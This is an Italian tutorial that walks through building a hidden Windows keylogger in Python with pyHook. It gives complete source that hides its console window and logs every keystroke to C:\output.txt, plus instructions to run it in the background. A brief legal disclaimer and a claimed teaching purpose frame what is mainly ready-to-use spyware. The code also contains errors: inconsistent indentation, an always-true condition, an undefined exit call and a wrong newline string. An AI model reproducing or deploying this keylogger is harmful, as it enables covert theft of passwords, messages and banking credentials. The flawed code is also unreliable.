Come creare un keylogger in soli 5 minuti

Come tutti sicuramente saprete, un keylogger è un programma in grado di intercettare tutto ciò che l’utente digita sulla tastiera del proprio computer. E suppongo sappiate altrettanto bene che, proprio per questa sua caratteristica, il keylogger è un software che non sempre si presta ad usi propriamente leciti, tant’è vero che ormai quasi tutti gli antivirus dispongono di funzionalità in grado di riconoscere la presenza di un keylogger attivo in background.

Di fatto quindi l’installazione di un keylogger su un computer che non sia il proprio o comunque ad insaputa del legittimo proprietario, si configura come un vero e proprio reato di violazione della privacy: i dati intercettati (come ad esempio sessioni di chat, username e password di Facebook o dell’ home banking, email, …) infatti vengono normalmente salvati su un file di log che il possessore del keylogger recupera in un secondo momento o che addirittura gli vengono inviati automaticamente via email.

A scopo puramente didattico vedremo come sia possibile creare un semplice keylogger completamente funzionante, sfruttando la poternza di Python. Di seguito i passi da seguire:

1. Scaricate ed installate i software necessari:
   • Python 2.6: http://www.python.org/
   • Pyhook per Python 2.6: pyhook.sourceforge.net
   • Python for Windows Extensions: http://sourceforge.net/projects/pywin32/
2. Dal menu di avvio selezionate “Python 2.6 > PythonWin” per avviare l’editor
3. Dal menù selezionate “File > New“, quindi scegliete l’opzione “Python Script” e date “OK“
4. Incollate il seguente sorgente (attenzione alle indentazioni) o in alternativa scaricate direttamente il file da questo link:

   import win32api
   import win32console
   import win32gui
   
   import pythoncom, pyHook
   
   win = win32console.GetConsoleWindow()
   win32gui.ShowWindow(win,0)
   
   def OnKeyboardEvent(event):
     if event.Ascii==5:
       _exit(1)
   
    if event.Ascii != 0 or 8:
      f=open('c:\output.txt','r')
      buffer=f.read()
      f.close()
      f=open('c:\output.txt','w')
      keylogs=chr(event.Ascii)
      if event.Ascii==13:
        keylogs='/n'
      buffer += keylogs
      f.write(buffer)
      f.close()
   
   hm = pyHook.HookManager()
   hm.KeyDown = OnKeyboardEvent
   hm.HookKeyboard()
   pythoncom.PumpMessages()

5. Salvate il file in c:\ come “logger.py“, quindi da PythonWin digitate CTRL+R: il keylogger verrrà avviato in background e fino a quando rimarrà in esecuzione registrerà sul file “C:\output.txt” tutto ciò che verrà digitato sulla tastiera.